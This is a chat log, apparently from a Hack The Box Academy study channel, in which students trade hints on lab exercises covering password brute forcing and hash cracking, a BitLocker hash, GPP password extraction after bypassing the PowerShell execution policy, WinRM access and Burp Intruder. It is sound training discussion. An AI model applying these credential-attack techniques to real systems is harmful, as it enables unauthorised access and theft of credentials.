I need a little nudge with these questions from the password attack module. Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam." Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. please

What did you already did?

I found the SSH, WinRM, and RDP keys, but only the SMB one is giving me trouble.

I found the SSH, WinRM, and RDP keys, but only the SMB one is giving me trouble.

but you need to connect with ssh why are you searching for the smb creds?

OK. This question, "Create a mutated wordlist using the files in the ZIP file under 'Resources' in the top right corner of this section. Use this wordlist to brute force the password for the user 'sam.' Once successful, log in with SSH and submit the contents of the flag.txt file as your answer," I haven't found it yet. I don't know which hashcat rule to combine with the password.list to find the credential for 'sam.'

you just have to do the exact same command then in the module did you downloaded the zip file from the resources?

i remember a lot of people had problems with that part, when u use hydra how much time does it take to do all the file?

Yes, I already downloaded the ZIP. Let me try it again. Thank you so much, bro; you are my hero.

i have the password, but try again and if it don't show up i will help you further i already helped a lot of people on the same problem and same section 🤣

I made a file with 1,494 lines, and it took 16 minutes.

jajajajajajaja omg brooo

okej try again and tell me if you got it

did you use that

Yes, I use that, but different passwords. Do I have to use that one exactly?

Omg, I just finished the footprinting module. So much information and for some reason the medium challenge didn't work on pwnbox, too bad it took me days to figure that out lmao. Spent days on that, but only maybe an hour on footprinting hard

I think the command you use to get into the computer didn't work for me for some reason. Had to use an alternative. Saying it this way to avoid spoilers

Gotta give props to the HTB team. Genuinely made a great course and I'm absorbing information like a sponge

can i ask if this statement is true. hashcat when you run there the potfile right. Does the potfile consist of the ntds.dit and system registry?

Guys, quick question if anyone can help.
if I got SYSTEM shell on one of the machine in AD, but do not find any valid domain user on that system that is no NTLM hash from mimikatz and no TGS accounts through kerberoasting. What could be my next step in this scenario because till now I dont have any domain user with me, just local admin account this machine. Is this something I can do with my SYSTEM shell on this current machine?

what module/section

no, potfile only contains cracked hashes

if whatever ntlm/aes hashes in ntds were cracked, potfile will record it, otherwise it won't be in there

I see. Thank you.

Did you try building the tool inside the machine? WEB01

Password attacks section Credential hunting in Linux I’m not getting any output using hydra with mutated wordlist how much time does it take for it to complete? Because the flag is password of the user Will.

hey yall working through session security atm and first time using burpsuite, what do i configure the firefox proxy to be? default at 127 8080 or something specific to my pwnbox?

I've seen HTB staff say they don't want to have people brute for hours so they try to keep it under 30 min

whatever port you want really

Phew! Just completed the Exploiting We Vulnerabilities in Thick-Client Applications section of Attacking Common Applications and it was a lot to take! I followed what was taught in the section step by step. Even then, I was getting stuck at so many places. There is no way that I could have figured all the things out by myself. So, when taking CPTS, we are expected to do these things by ourselves? If so, can anyone give me some advice on how I can be better prepared?

I’m goin in hoping it’s just not in there 😂

I doubt everyone who passed knows Java applications that well too

You haven't taken CPTS yet? You were helping people out. So I thought you had already taken the exam

I’m guessing it’s not in the exam

Nah I started the path 2 months ago and just started helping with module I’ve done

You reached "Attcking Common Applications" within two months!

I started the path way before. I have been doing this for 7-8 months

How much time do you dedicate per day?

That part took me like 6 hours 😭

I have been doing this for past 2-3 days/

I only do it for 2-3 hours per day though 🤐

Im done with the path now and I spent like 6+ everyday

No school, no internships🥲, no jo, so just cpts

When are you planning to take the exam?

Kerberos Attacks - Final Assesment
In the very last question I've done ssh local port forwarding to access the server machine but after that the RDP is very slow and laggy then I checked I wasn't able to ping the initial access machine anymore. I tried restarting it the third time and now it's been loading since eons

CTRL+SHIFT+R

This month probably

Best of Luck!

Tried that already, seems like ssh local port forwarind and X11 forwarding is crashing the initial machine a lot

Thx

Just finished the sliver module, skills assessment was good practice

doubt it's crashing. try another browser.

make sure you have no adblock on

I'm trying on opera browser as of now. I've did the whole modules on this browser. I'm at the very last question

it's possible the platform is down, but no one else has said that, so it's probably your browser

you could also try another region

Check this the initial access machine is crashing again and again just after I perform ssh tunnelling or x11 port forwarding which is the itended path

Nothing wrong with my browser for sure

@cloud urchin

i've only seen that happen under 2 scenarios. 1) browser issue. this is the most common reason. 2) platform is down.

How browser is effecting this if I'm accessing the machine from my kali linux?

you showed a picture of your browser where the target is spawning and stated it's been loading for eons

you aren't pinging your spawned target, you're pinging something else. you'd only get your spawned target ip if it actually spawned and the IP was visible to you in your browser.

The target is now loaded but machine is very unstable. It pings then it doens't

use the tcp vpn if you're not on it, try another region.

This shouldn't be the case cause I'm at the very last question of the final assessment and everything was working well until I did the ssh tunnelling to access the internal joined AD Windows machine which messed everything up

ok then reach out to support on the website

Understood will do

i'd really suggest at minimum trying my troubleshooting steps first, aka another region and tcp vpn

you might be surprised in the performance difference

i'm in the US and switching to EU vpn was night and day

could not find anything with the whole wordlist.

Password attack module, hard lab. im trying to ||brutefore using mut wordlists for bitlocker, my command is john --wordlist=mut_password.list hash.hashes idk but it only gives possible password with whole wordlist, that is 123456789! || anyone could point me in right direction?

I'm from west asia region

Have you tried the password?

ok, but you say there's a problem, i provide something to try, and you brush it off without trying... i can't really help you much more especially when you don't take the basic troubleshooting steps

Only inside as user johanna, trying to open david's user profile. || did not work.||

I understand I'm trying those solution and I'm not trying to brush off anything

It’s bitlocker, so it’s a drive that’s locked

yes, i tried mounting it, got lot of errors.

i downloaded it properly, im sure of it, i used smget generally used for larger files over smb

Try windows vm if you can. I couldn’t mount it on linux

I think others were able to tho

do you need password during mounting? or need password to open the drive after mounting?

After

okay thanks.

okay i tried mounting it with windows, password incorrect.

i dont get it, i used mut wordlists, password.list, used rockyou.txt for 4 hours.

Should not take 4 hours to crack the hash

Are you cracking on a vm?

pwnbox

Do you have hashcat on your host machine

yes

pwnbox

i hear hashcat is not good when hash is collected via john

plus i feel john is used for this cracking.

I used hashcat on my windows host

does not matter. matters is the wordlist. right?

Yeah but it shouldn’t take that long tho

||should i run again with rockyou.txt? mut, plain password.list could not crack it.||

if you use wrong wordlists, always gonnna take long.

I did it with RY and got it in a few secs

Mutated is a lot shorter and it’s in there

Try the pass again

Dm the hash if you think it’s wrong

okay

check dm

Module: Windows Privilege Escalation
Section: Citrix Breakout
Link to section: https://academy.hackthebox.com/module/67/section/2502

I'm having trouble launching the Citrix environment. I RDP'd to the machine using the provided credentials. Then visited http://humongousretail.com/remote/, downloaded the client, and obtained the launch.ica file. After clicking to download the client, I got a the file, linuxx86-11.100.158406.tar.gz. I extracted the contents of this file but now I'm unsure how to proceed.

Iirc The ica file should open the environment

That's what it says in the module. But am I supposed to do something with the linuxx86-11.100.158406.tar.gz archive?

I tried clicking on the monitor icon, but it just keeps downloading launch.ica files.

lemme check

I think I may have found it. I think I need to open the launch.ica file using the citrix receiver application. Trying it now.

Okay, it wasn't Citrix receiver. Still stuck.

i just opened the ica file and it worked

Was just trying that and it worked. I'd tried to give it execution permission earlier and launch from the cmdline but that didn't work for whatever reason. Just launched it from File Manager and it's connecting. Thanks.

i just clicked the download on the top right of firefox

Does it take long to connect? It's been quite a while already.

nah mine just loaded instantly

you clicked launch.ica?

Yup

try on firefox

Had to reset the machine for it to work, thx.

only reason i havent 100% the module is beacuse i cant access the citrix breakout content at all lol. its too slow for me

Yeah, feelin the pain rn

Anyone know how to get out of the Citrix window? When I launched it, it went full screen and now I'm stuck 💀

Ended up just disconnecting to setup the file transfer since I couldn't find a way to minimize/escape it.

🤣 I was pressing the windows key and opening a new terminal every time

There’s def a better way to do things

I think I may have to skip it for now as well due to the lag

Does anyone knows what is the reward for keeping streak of 30 weeks?

A badge

I was quite bummed out when I found out that was the "special reward" for keeping your streak

you get a sense of pride and accomplishment

is it possible to directly copy paste from the host to the pwn box without using the clipboard every time as a middle man to copy the info we needed from the host to pwnbox?

works if you're using chrome I think

Yeah, In chrome its working. Thank you so much. is there anyway that I can able to use this feature in firefox too, if possible?

Attacking Enterprise Networks | Lateral Movement
Escalate privileges on the MS01 host and submit the contents of the flag.txt file on the Administrator Desktop.

I found password backadm but when i try to connect ms01 output is:

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

I've been trying to connect since last night but it doesn't seem to work

Maybe that user isn't for ms01, also I suggest doing the module blind

Don't read the questions or module material

Just work through it to DA without worrying about answering questions

I saw

the module specifies a connection via backupadm

I understand that

What I'm telling you is working through it without reading the q's

Authorization error generally means that the username or password didn't work

The questions lead you on, which defeats the purpose of doing it blind

You'll feel far better working through it blind imo

does anyone know if the wayback machine is up? (for the info gathering module)

spoilers

Make sure you're using the right pw bc there's 2 backup accounts

Don't see why it wouldn't be

Okay maybe I understand

thanks

all queries are giving an error 503

I can visit the site just fine

Ah I see what you mean now

their api is taking a nap ¯_(ツ)_/¯

☠️

i'll just move onto the next section then

i'll see if tools like finalrecon work

if not then i'll probably leave it until the entire internet archive drama is over

Hey, follow the instructions in #welcome and get verified, share a screenshot please, pretty sure someone who has done it can help you!

Okay buddy

Cheers!

Hi, I am working on the Attacking Common ApplIcations, I am using my own Kali linux... specifically I am trying to use the joomla-brute.py right now in the Joomla section, I am a little concerned i am not sure why, I guess because it is taking awhile, I am using rockyou.txt, I don't know if I am wasting my time or not. I assume this script is working because I am getting the pairs in red for fail, but it is not very verbose.

In addition to that I was unable to use droopescan because of imp and I messed with that a lot I tried the docker route and I still could not find imp to get it to run. I think there has been some significant changes with python in kali recently. I don't know if I need help even, but I sure hope I am running the right list.

Yeah a fair bit of the tools are outdated

Hey guys recently I won htb vip+ in ctf competition but i don't wanna use it now cuz of exam so what is the expiry date of the code I mean is it there any? I am new to htb thing

Droopescan worked fine for me

Ask support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Ok

lee is fast ⛈️

well I ran the older tool I am not sure that I need to get droopescan running to advance...

i remember fucking around with some stuff ¯_(ツ)_/¯

maybe there is some new alternatives... I dont know what the imp is, I guess kali is having all the python packages with the python prefix now, and you have have to make a venv which is what I normally do anyways, but I could not find this imp that would not import, and it is my understanding that they got rid of the package... I was really suprised when I went the docker route I just just got the same fail to import imp

But i wouldn't use rockyou btw

Id use a smaller wordlist

kewl I already switched for smallers,

No idea about imp

me either

¯_(ツ)_/¯

Can anyone help me with hacking wordpress

The module, I'm stuck at finding the directory indexing part 😦

I'm trying to execute a Get-GPPPassword on a remote desktop and it isn't working. At first it was giving me this error:

.\Get-GPPPassword.ps1 : File C:\Users\bob\Downloads\Get-GPPPassword.ps1 cannot be loaded because running scripts is
disabled on this system. For more information, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\Get-GPPPassword.ps1
+ ~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess

After I did some research I found and used this to allow me to run the script:

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process

But now it's just running the script with no output or errors. Any help? Module: Windows Attacks & Defense: GPP Passwords

The correct list was in the example.

follow the module on how to use it

In the Nessus Skill Assessment in the Pentesting job path there are several times where there could be two answers but it's onl accepting one of them. Is this a bug or am I misunderstanding some things? For example, there are two readable shares and it only accepts one answer.

I did.

Yes but i cant bcs i need to install something and i cant do it bcs the host has no connexion if im not wrong

I have a good article to mount on linux i show you when im home

did you? because just running the script like that is not the correct way to use it

I started with Import-Module first if that's what you are talking about. I got the same error for both. Is there something else I'm missing?

The problem for mounting it on the target host is that you need the administrator password bcs you have no rights so you have to transfer it to you own windows machine im gonna try to find the module for mounting it in linux

Was the problem the . \ & ps.1?

without .\

and without .ps1, just "Get-GPPPassword"

Interesting. Thank you @next bronze and @solid quarry. Appreciate it. I thought the . / was like "Sudo" but I guess it doesn't work like that?

Mount it on your own system

Lol no

you've already imported the script, now you're calling a function insdie it

nope, what you did there was first import a powershell script into your session, that script contains functions, the Get-GPPassword is a function from this powershell script that will execute the attack

When you import a module, using .\ tells you cwd to look for the file to import

Where can i ask questions about proLabs like Dante?

Oh that makes sense. My mistake came from auto completing with tag instead of just writing it out. Thanks a bunch.

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

With that article i founded it pretty easy to decrypte and read the file

Yeah thats is what i did ^^

#1263635449335910531 ; read and follow #welcome to access it

Still need help with that?

yeah bro

can you please help me?

You have the api key, now you need to find another query to use it with.|| Look through all the queries to see which one uses a key as an argument||

I used the inql burp extension to help me build the query, saves some time

hello for the last question it’s been 2 hours that I’m waiting for the hash with inveigh there are some things I do wrong?? I am administrator with user find
https://academy.hackthebox.com/module/163/section/1549

https://academy.hackthebox.com/module/15/section/34
This module is a tier 0 "free" module. What is the total cubes that will be rewarded back to you by completing it?
what will be the answer?

100% of the cubes you paid will be rewarded

thanks man
actually i tried 10 cubes that's why i got error :3

the answer makes no sense, I don't even know why it's written there

Open up a ticket in erratum, they messed that thing up

Hey bro, I haven’t been able to find the password.

Is it ok for you if i take a look at it to night?

When I click on hint button there is no hint only the page getting little bit bigger any clur why id this happening?

I'm working on the Burp Intruder section of the Using Web Proxies module. I'm meant to get the html of a certain file under the admin directory. I've tried every combination I can think of but for the life of me when I send the payload it doesn't stick to the /admin directory. Can anyone tell me how it's actually set up?

My get line is GET §/admin§.html HTTP/1.1

Ive tried every combination of the above I can think of, but I just can't seem to get it to work. Any advice?

im sorry im gonna ask a bunch of questions

but i am stuck currently on HyperText Transfer Protocol (HTTP) web requests